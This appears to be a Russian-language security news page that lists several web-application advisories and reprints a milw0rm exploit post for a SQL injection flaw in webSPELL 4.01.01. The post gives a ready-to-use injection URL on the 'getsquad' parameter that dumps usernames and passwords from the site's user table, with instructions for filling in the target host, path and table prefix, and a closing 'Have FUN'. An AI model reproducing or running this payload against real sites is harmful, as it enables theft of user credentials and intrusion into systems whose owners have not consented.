Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

Security Advisory for Bugzilla 2.18.5, 2.20.2, 2.22, and 2.23.2

SYMSA-2006-010: Directory Traversal in IronWebMail

DigitalHive <= v2.0 RC2 (page) Remote File Inclusion Exploit

Def-Blog <= v1.0.1 (article) Remote SQL Injection Exploit

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	16 октября 2006 г.
Subject:	webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

# WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
# by: Kiba

#EXPLOIT:
http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,
1,username,1,password,1+from+[PREFIX]_user/*

#REPLACE:
(if the website is http://yourwebsite.de/webspell/index.php)
[PAGE]  with  "yourwebsite.de"
[PATH]  with  "webspell" (if there is no subdirectory then remove it)
[PREFIX] the Prefix of the database tables (try "webs_user")

# Have FUN